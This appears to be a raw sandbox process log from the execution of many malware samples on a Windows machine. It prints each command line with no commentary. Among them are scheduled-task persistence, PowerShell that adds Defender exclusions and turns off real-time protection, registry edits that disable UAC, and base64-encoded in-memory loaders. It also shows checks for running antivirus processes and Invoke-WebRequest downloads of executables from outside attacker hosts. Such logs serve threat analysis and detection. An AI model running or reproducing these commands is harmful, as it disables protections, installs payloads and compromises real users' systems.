C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\nZRwf4i3gbqv.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\3ufjDrYsMBh2.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\qJmll3zvJ2Zb.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\Desktop\Files\stail.exe
"C:\Users\Admin\Desktop\Files\stail.exe"
C:\Users\Admin\AppData\Local\Temp\is-VS7FV.tmp\stail.tmp
"C:\Users\Admin\AppData\Local\Temp\is-VS7FV.tmp\stail.tmp" /SL5="$60576,3881966,54272,C:\Users\Admin\Desktop\Files\stail.exe"
C:\Windows\SysWOW64\net.exe
"C:\Windows\system32\net.exe" pause lerry_video_11261
C:\Users\Admin\AppData\Local\Lerry Video 22.0.1000\lerryvideo.exe
"C:\Users\Admin\AppData\Local\Lerry Video 22.0.1000\lerryvideo.exe" -i
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 pause lerry_video_11261
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\pqGYxp582ui4.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\grjujyNaBLaKbU.exe"
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\grjujyNaBLaKbU" /XML "C:\Users\Admin\AppData\Local\Temp\tmp283A.tmp"
C:\Users\Admin\Desktop\Files\9758xBqgE1azKnB.exe
"C:\Users\Admin\Desktop\Files\9758xBqgE1azKnB.exe"
C:\Users\Admin\Desktop\Files\9758xBqgE1azKnB.exe
"C:\Users\Admin\Desktop\Files\9758xBqgE1azKnB.exe"
C:\Users\Admin\Desktop\Files\windowsexecutable.exe
"C:\Users\Admin\Desktop\Files\windowsexecutable.exe"
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WRW3jUfKERoW.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\6vc0q3VbwkxW.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\Desktop\Files\Client_protected.exe
"C:\Users\Admin\Desktop\Files\Client_protected.exe"
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\PdwGGa0lF9fa.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k WerSvcGroup
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 3084 -ip 3084
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3084 -s 1408
C:\Users\Admin\Desktop\a\filer.exe
"C:\Users\Admin\Desktop\a\filer.exe"
C:\Users\Admin\Desktop\a\AmLzNi.exe
"C:\Users\Admin\Desktop\a\AmLzNi.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath C:\Users\Admin\Desktop\a\filer.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Invoke-WebRequest -Uri "https://ratsinthehole.com/vvvv/yVdlbFlx" -OutFile "C:\Users\Public\Guard.exe""
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1SiI4Zkx6p69.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
C:\Windows\System32\Wbem\wmic.exe
wmic os get Caption
C:\Windows\System32\Wbem\wmic.exe
wmic cpu get Name
C:\Windows\System32\Wbem\wmic.exe
wmic path win32_VideoController get name
C:\Windows\System32\Wbem\wmic.exe
wmic csproduct get UUID
C:\Users\Admin\Desktop\Files\xxz.exe
"C:\Users\Admin\Desktop\Files\xxz.exe"
C:\Windows\system32\mspaint.exe
"C:\Windows\system32\mspaint.exe" "C:\Users\Admin\Desktop\a\screenshot_0.png"
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s DeviceAssociationService
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s DsmSvc
C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -Embedding
C:\Windows\system32\mspaint.exe
"C:\Windows\system32\mspaint.exe" "C:\Users\Admin\Desktop\a\screenshot_0.png"
C:\Users\Admin\Desktop\a\Xworm%20V5.6.exe
"C:\Users\Admin\Desktop\a\Xworm%20V5.6.exe"
C:\Users\Admin\Desktop\a\XClient.exe
"C:\Users\Admin\Desktop\a\XClient.exe"
C:\Users\Admin\Desktop\a\333.exe
"C:\Users\Admin\Desktop\a\333.exe"
C:\Users\Admin\Desktop\a\VBVEd6f.exe
"C:\Users\Admin\Desktop\a\VBVEd6f.exe"
C:\Users\Admin\Desktop\a\test12.exe
"C:\Users\Admin\Desktop\a\test12.exe"
C:\Users\Admin\Desktop\a\test6.exe
"C:\Users\Admin\Desktop\a\test6.exe"
C:\Users\Admin\Desktop\a\test14.exe
"C:\Users\Admin\Desktop\a\test14.exe"
C:\Users\Admin\Desktop\Files\taskhost.exe
"C:\Users\Admin\Desktop\Files\taskhost.exe"
C:\Users\Admin\Desktop\a\pantest.exe
"C:\Users\Admin\Desktop\a\pantest.exe"
C:\Users\Admin\Desktop\a\test9.exe
"C:\Users\Admin\Desktop\a\test9.exe"
C:\Users\Admin\Desktop\a\test10-29.exe
"C:\Users\Admin\Desktop\a\test10-29.exe"
C:\Users\Admin\Desktop\a\test19.exe
"C:\Users\Admin\Desktop\a\test19.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\Files\taskhost.exe'
C:\Users\Admin\Desktop\a\test10.exe
"C:\Users\Admin\Desktop\a\test10.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'taskhost.exe'
C:\Users\Admin\Desktop\a\test_again4.exe
"C:\Users\Admin\Desktop\a\test_again4.exe"
C:\Users\Admin\Desktop\a\test23.exe
"C:\Users\Admin\Desktop\a\test23.exe"
C:\Users\Admin\Desktop\a\test5.exe
"C:\Users\Admin\Desktop\a\test5.exe"
C:\Users\Admin\Desktop\a\test11.exe
"C:\Users\Admin\Desktop\a\test11.exe"
C:\Users\Admin\Desktop\a\test20.exe
"C:\Users\Admin\Desktop\a\test20.exe"
C:\Users\Admin\Desktop\a\test_again3.exe
"C:\Users\Admin\Desktop\a\test_again3.exe"
C:\Users\Admin\Desktop\a\test16.exe
"C:\Users\Admin\Desktop\a\test16.exe"
C:\Users\Admin\Desktop\a\test13.exe
"C:\Users\Admin\Desktop\a\test13.exe"
C:\Users\Admin\Desktop\a\test_again2.exe
"C:\Users\Admin\Desktop\a\test_again2.exe"
C:\Users\Admin\Desktop\a\test15.exe
"C:\Users\Admin\Desktop\a\test15.exe"
C:\Users\Admin\Desktop\a\test18.exe
"C:\Users\Admin\Desktop\a\test18.exe"
C:\Users\Admin\Desktop\a\test21.exe
"C:\Users\Admin\Desktop\a\test21.exe"
C:\Users\Admin\Desktop\a\test22.exe
"C:\Users\Admin\Desktop\a\test22.exe"
C:\Users\Admin\Desktop\a\test8.exe
"C:\Users\Admin\Desktop\a\test8.exe"
C:\Users\Admin\Desktop\a\test7.exe
"C:\Users\Admin\Desktop\a\test7.exe"
C:\Users\Admin\Desktop\a\test-again.exe
"C:\Users\Admin\Desktop\a\test-again.exe"
C:\Users\Admin\Desktop\a\test17.exe
"C:\Users\Admin\Desktop\a\test17.exe"
C:\Users\Admin\Desktop\a\vg9qcBa.exe
"C:\Users\Admin\Desktop\a\vg9qcBa.exe"
C:\Users\Admin\Desktop\a\vg9qcBa.exe
"C:\Users\Admin\Desktop\a\vg9qcBa.exe"
C:\Users\Admin\Desktop\a\vg9qcBa.exe
"C:\Users\Admin\Desktop\a\vg9qcBa.exe"
C:\Users\Admin\Desktop\a\vg9qcBa.exe
"C:\Users\Admin\Desktop\a\vg9qcBa.exe"
C:\Users\Admin\Desktop\Files\LoadNew.exe
"C:\Users\Admin\Desktop\Files\LoadNew.exe"
C:\Users\Admin\Desktop\Files\OneDrive.exe
"C:\Users\Admin\Desktop\Files\OneDrive.exe"
C:\Users\Admin\Desktop\Files\Armanivenntii_crypted_EASY.exe
"C:\Users\Admin\Desktop\Files\Armanivenntii_crypted_EASY.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"
C:\Users\Admin\Desktop\Files\25072023.exe
"C:\Users\Admin\Desktop\Files\25072023.exe"
C:\Users\Admin\Desktop\Files\PctOccurred.exe
"C:\Users\Admin\Desktop\Files\PctOccurred.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k move Powell Powell.cmd & Powell.cmd & exit
C:\Users\Admin\Desktop\Files\crypted8888.exe
"C:\Users\Admin\Desktop\Files\crypted8888.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Users\Admin\Desktop\a\win.exe
"C:\Users\Admin\Desktop\a\win.exe"
C:\Windows\SysWOW64\route.exe
route print
C:\Windows\SysWOW64\tasklist.exe
tasklist
C:\Windows\SysWOW64\findstr.exe
findstr /I "wrsa.exe opssvc.exe"
C:\Windows\SysWOW64\arp.exe
arp -a 10.127.0.1
C:\Users\Admin\Desktop\Files\PharmaciesDetection.exe
"C:\Users\Admin\Desktop\Files\PharmaciesDetection.exe"
C:\Windows\SysWOW64\tasklist.exe
tasklist
C:\Windows\SysWOW64\findstr.exe
findstr /I "avastui.exe avgui.exe bdservicehost.exe ekrn.exe nswscsvc.exe sophoshealth.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k move Ruth Ruth.cmd & Ruth.cmd & exit
C:\Users\Admin\Desktop\a\x4lburt.exe
"C:\Users\Admin\Desktop\a\x4lburt.exe"
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\computerlead.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\computerlead.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c md 193997
C:\Windows\SysWOW64\findstr.exe
findstr /V "JulieAppMagneticWhenever" Hist
C:\Windows\SysWOW64\cmd.exe
cmd /c copy /b ..\Medicines + ..\While + ..\Remained + ..\Bs + ..\Ak + ..\Statistical + ..\Entity + ..\Autumn + ..\Scott + ..\Keyboards y
C:\Users\Admin\AppData\Local\Temp\193997\Restructuring.pif
Restructuring.pif y
C:\Windows\SysWOW64\choice.exe
choice /d y /t 5
C:\Windows\SysWOW64\tasklist.exe
tasklist
C:\Windows\SysWOW64\findstr.exe
findstr /I "wrsa.exe opssvc.exe"
C:\Windows\SysWOW64\tasklist.exe
tasklist
C:\Windows\SysWOW64\findstr.exe
findstr /I "avastui.exe avgui.exe ekrn.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe"
C:\Windows\SysWOW64\cmd.exe
cmd /c md 447331
C:\Windows\SysWOW64\findstr.exe
findstr /V "typesfaxincreasecompound" Ensemble
C:\Windows\SysWOW64\cmd.exe
cmd /c copy /b Compile + Olive + Within + Psychiatry 447331\p
C:\Users\Admin\AppData\Local\Temp\447331\Buyer.pif
Buyer.pif p
C:\Windows\SysWOW64\choice.exe
choice /d y /t 5
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEQAZQBzAGsAdABvAHAAXABGAGkAbABlAHMAXABPAG4AZQBEAHIAaQB2AGUALgBlAHgAZQA7ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUAByAG8AYwBlAHMAcwAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEQAZQBzAGsAdABvAHAAXABGAGkAbABlAHMAXABPAG4AZQBEAHIAaQB2AGUALgBlAHgAZQA7AEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABkAG8AYwB1AG0AZQBuAHQAcwBcAE8AbgBlAEQAcgBpAHYAZQAuAGUAeABlADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAQwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAZABvAGMAdQBtAGUAbgB0AHMAXABPAG4AZQBEAHIAaQB2AGUALgBlAHgAZQA=
C:\Users\Admin\AppData\Local\Temp\193997\Restructuring.pif
C:\Users\Admin\AppData\Local\Temp\193997\Restructuring.pif
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\Admin\AppData\Local\Temp\447331\Buyer.pif" & rd /s /q "C:\ProgramData\AAKJEGCFBGDH" & exit
C:\Windows\SysWOW64\timeout.exe
timeout /t 10
C:\Users\Admin\Desktop\Files\postbox.exe
"C:\Users\Admin\Desktop\Files\postbox.exe"
C:\Users\Admin\AppData\Local\Temp\tuwhzy.exe
"C:\Users\Admin\AppData\Local\Temp\tuwhzy.exe"
C:\Users\Admin\AppData\Local\Temp\iazsfn.exe
"C:\Users\Admin\AppData\Local\Temp\iazsfn.exe"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Updater.vbs"
C:\Users\Admin\AppData\Local\Temp\OneDrive.exe
"C:\Users\Admin\AppData\Local\Temp\OneDrive.exe"
C:\Windows\system32\cmd.exe
cmd /c copy "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\Users\Admin\AppData\Local\Temp\Updater.vbs.exe" /Y
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
C:\Users\Admin\AppData\Local\Temp\Updater.vbs.exe
"C:\Users\Admin\AppData\Local\Temp\Updater.vbs.exe" -enc JABLAHgAcAByAGsAdABqAG8AbwAgAD0AIABbAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgBHAGUAdABDAHUAcgByAGUAbgB0AFAAcgBvAGMAZQBzAHMAKAApAC4ATQBhAGkAbgBNAG8AZAB1AGwAZQAuAEYAaQBsAGUATgBhAG0AZQAuAFIAZQBwAGwAYQBjAGUAKAAnAC4AZQB4AGUAJwAsACcAJwApADsAJABOAHkAdgBoAHkAeAB2AGsAaQAgAD0AIABnAGUAdAAtAGMAbwBuAHQAZQBuAHQAIAAkAEsAeABwAHIAawB0AGoAbwBvACAAfAAgAFMAZQBsAGUAYwB0AC0ATwBiAGoAZQBjAHQAIAAtAEwAYQBzAHQAIAAxADsAIAAkAEwAZQBwAGsAbAAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABOAHkAdgBoAHkAeAB2AGsAaQAuAFIAZQBwAGwAYQBjAGUAKAAnAFIARQBNACAAJwAsACAAJwAnACkALgBSAGUAcABsAGEAYwBlACgAJwBAACcALAAgACcAQQAnACkAKQA7ACQARABmAGEAdwBuAG8AIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKAAgACwAIAAkAEwAZQBwAGsAbAAgACkAOwAkAEMAYwB5AGMAaQAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQA7ACQATgBsAGEAcwB6AGEAcQBoAGQAcQAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBHAHoAaQBwAFMAdAByAGUAYQBtACAAJABEAGYAYQB3AG4AbwAsACAAKABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQA7ACQATgBsAGEAcwB6AGEAcQBoAGQAcQAuAEMAbwBwAHkAVABvACgAIAAkAEMAYwB5AGMAaQAgACkAOwAkAE4AbABhAHMAegBhAHEAaABkAHEALgBDAGwAbwBzAGUAKAApADsAJABEAGYAYQB3AG4AbwAuAEMAbABvAHMAZQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AIAAkAEwAZQBwAGsAbAAgAD0AIAAkAEMAYwB5AGMAaQAuAFQAbwBBAHIAcgBhAHkAKAApADsAWwBBAHIAcgBhAHkAXQA6ADoAUgBlAHYAZQByAHMAZQAoACQATABlAHAAawBsACkAOwAgACQARABqAGkAaABjAGMAaABtAHoAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEEAcABwAEQAbwBtAGEAaQBuAF0AOgA6AEMAdQByAHIAZQBuAHQARABvAG0AYQBpAG4ALgBMAG8AYQBkACgAJABMAGUAcABrAGwAKQA7ACAAJABKAG4AegBhAHgAagAgAD0AIAAkAEQAagBpAGgAYwBjAGgAbQB6AC4ARQBuAHQAcgB5AFAAbwBpAG4AdAA7ACAAWwBTAHkAcwB0AGUAbQAuAEQAZQBsAGUAZwBhAHQAZQBdADoAOgBDAHIAZQBhAHQAZQBEAGUAbABlAGcAYQB0AGUAKABbAEEAYwB0AGkAbwBuAF0ALAAgACQASgBuAHoAYQB4AGoALgBEAGUAYwBsAGEAcgBpAG4AZwBUAHkAcABlACwAIAAkAEoAbgB6AGEAeABqAC4ATgBhAG0AZQApAC4ARAB5AG4AYQBtAGkAYwBJAG4AdgBvAGsAZQAoACkAIAB8ACAATwB1AHQALQBOAHUAbABsAA==
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "OneDrive" /tr "C:\Users\Admin\AppData\Roaming\OneDrive.exe"
C:\Users\Admin\Desktop\Files\pp.exe
"C:\Users\Admin\Desktop\Files\pp.exe"
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"
C:\Users\Admin\AppData\Roaming\OneDrive.exe
"C:\Users\Admin\AppData\Roaming\OneDrive.exe"
C:\Users\Admin\Desktop\Files\5_6190317556063017550.exe
"C:\Users\Admin\Desktop\Files\5_6190317556063017550.exe"
C:\Users\Admin\Desktop\Files\av_downloader1.1.exe
"C:\Users\Admin\Desktop\Files\av_downloader1.1.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\F99A.tmp\F9AB.tmp\F9AC.bat C:\Users\Admin\Desktop\Files\av_downloader1.1.exe"
C:\Windows\system32\mshta.exe
mshta vbscript:createobject("shell.application").shellexecute("C:\Users\Admin\Desktop\Files\AV_DOW~1.EXE","goto :target","","runas",1)(window.close)
C:\Users\Admin\Desktop\Files\AV_DOW~1.EXE
"C:\Users\Admin\Desktop\Files\AV_DOW~1.EXE" goto :target
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\FCC6.tmp\FCC7.tmp\FCC8.bat C:\Users\Admin\Desktop\Files\AV_DOW~1.EXE goto :target"
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "ConsentPromptBehaviorAdmin" /t reg_dword /d 0 /F
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t reg_dword /d 0 /F
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "PromptOnSecureDesktop" /t reg_dword /d 0 /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "reg query HKEY_CLASSES_ROOT\http\shell\open\command"
C:\Windows\system32\reg.exe
reg query HKEY_CLASSES_ROOT\http\shell\open\command
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.pornhub.com/
C:\Windows\system32\attrib.exe
attrib +s +h d:\net
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x124,0x128,0x12c,0x100,0x130,0x7ffb3b3046f8,0x7ffb3b304708,0x7ffb3b304718
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -c "invoke-webrequest -uri http://206.217.142.166:1234/windows/v2/dr.bat -outfile d:\net\dr\dr.bat"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2092,2014382943238319920,16044216498022605925,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2096 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2092,2014382943238319920,16044216498022605925,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2288 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2092,2014382943238319920,16044216498022605925,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2856 /prefetch:8
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,2014382943238319920,16044216498022605925,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3512 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,2014382943238319920,16044216498022605925,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3524 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,2014382943238319920,16044216498022605925,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4108 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
